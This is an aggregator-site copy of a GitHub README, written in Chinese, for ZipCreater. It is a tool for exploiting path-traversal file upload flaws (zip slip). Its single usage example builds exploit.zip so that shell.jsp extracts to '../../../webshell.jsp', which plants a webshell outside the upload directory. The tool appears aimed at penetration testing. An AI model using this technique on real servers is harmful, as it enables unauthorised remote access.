4
GitHub - Rvn0xsy/zipcreater: ZipCreater主要应用于跨目录的文件上传漏洞的利用,它...
source link: https://github.com/Rvn0xsy/zipcreater
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
ZipCreater
ZipCreater主要应用于跨目录的文件上传漏洞的利用,它能够快速进行压缩包生成,evilarc.py不支持修改已有的压缩包,但ZipCreater可以。
使用方式:
假设/tmp/payload
文件夹内的文件列表如下:
1.txt
2.txt
shell.jsp
使用ZipCreater可以生成跨目录的文件名:
$ zipcreater -source /tmp/payload/ -dest /tmp/exploit.zip -filename shell.jsp -path ../../../webshell.jsp'
exploit.zip内容如下:
1.txt
2.txt
../../../webshell.jsp
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK